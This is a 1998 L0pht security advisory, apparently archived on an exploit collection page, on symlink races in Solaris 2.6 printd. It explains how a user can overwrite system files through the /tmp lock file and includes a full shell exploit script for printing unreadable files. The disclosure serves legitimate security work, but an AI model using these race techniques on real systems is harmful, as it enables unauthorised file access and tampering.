Solaris 2.6 printd tmpfile problem
| Description: | Standard insecure tmpfile hole |
| Author: | Silicosis <sili@l0pht.com> |
| Compromise: | unprivileged users can overwrite and create system files and print files they shouldn't be able to read. |
| Vulnerable Systems: | Solaris 2.6 |
| Date: | 11 March 1998 |
Date: Wed, 11 Mar 1998 11:23:44 -0600
From: Aleph One <aleph1@dfw.net>
To: BUGTRAQ@NETSPACE.ORG
Subject: Solaris printd security vulnerability
`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
L0pht Security Advisory
Document: L0pht Security Advisory
URL Origin: http://www.l0pht.com/advisories.html
Release Date: February 23, 1998
Application: printd (lp)
Operating Sys: Solaris 2.6
Severity: Users can overwrite/create system files
Users can print unreadable files
Author: silicosis <sili@l0pht.com>
Patch Status: Sun has been made aware of the vulnerabilities
3 weeks ago and still has not released a patch.
`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
Create/Overwrite Files:
Sun hasn't learned from it's past mistakes; temp files are still a
problem this time it's with 'printd' (lp). Upon printing a large file
that sits in the queue for ~1minute, a lock file (/tmp/.printd.lock) is
created. Before you print something large, create a symlink pointing to
the /tmp/.printd.lock towards something you'd like to create/overwrite.
When printd is done, the file your pointing to will have mode 640, and
the contents will contain printd's pid.
``````````````````````````
Printing unreadable files:
Sun has restructured their print spooling in Solaris 2.6. They've
gone over to a queueing system that's similar to sendmail:
[~]lp .tcshrc
[~]ls -al /var/spool/print
total 12
drwxr-xr-x 2 root lp 512 Feb 20 12:44 .
drwxrwxr-x 10 root bin 512 Feb 17 11:28 ..
-rw-rw-r-- 1 root staff 4 Feb 20 12:44 .seq
-rw-r----- 1 root staff 80 Feb 20 12:44 cfA037core
lrwxrwxrwx 1 root staff 19 Feb 20 12:44 dfA037core ->
/home/sili/.tcshrc
-rw-r----- 1 root staff 23 Feb 20 12:44 xfA037core
You have your control, transfer and datafiles. The datafile is just
a symlink to the file you printed, so if you link the file you printed
to something else *before* the queue is flushed, printd will print it.
A simple exploit script:
----[CUT HERE: sol26lp]----
#!/bin/sh
#
#Print unreadable files on solaris2.6
#sili@l0pht.com
#
# --If it didn't work, change $BIGFILE to
# something bigger.
#
# --Script usually works 80% of the time..
# Didn't work? Try again.. Throw something
# at the printspooler to slow it down.
#
TMPFILE="./.dmlr"
BIGFILE="/usr/lib/libc.so.1"
if [ $# != 1 ]; then
echo "Usage:"
echo
echo "./sol26lp <file>"
echo
echo "Print unreadable files on Solaris2.6"
echo " ----sili@l0pht.com"
exit 1
fi
echo "Need a large file to print, using $BIGFILE."
cp /usr/bin/vi $TMPFILE ; chmod 700 $TMPFILE
lp $TMPFILE ;
#sleep 1;
rm $TMPFILE ; ln -s $1 $TMPFILE
QF=`ls -al /var/spool/print |grep $TMPFILE |awk '{print $9}'`
echo "Queue File: /var/spool/print/$QF"
while [ -h /var/spool/print/$QF ]; do
echo "Waiting for file to print";
sleep 1;
done
echo "File printed. Erasing temp files."
rm $TMPFILE
echo "Done."
echo
echo " --sili@l0pht.com 1/20/98"
----[CUT HERE: sol26lp]----
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
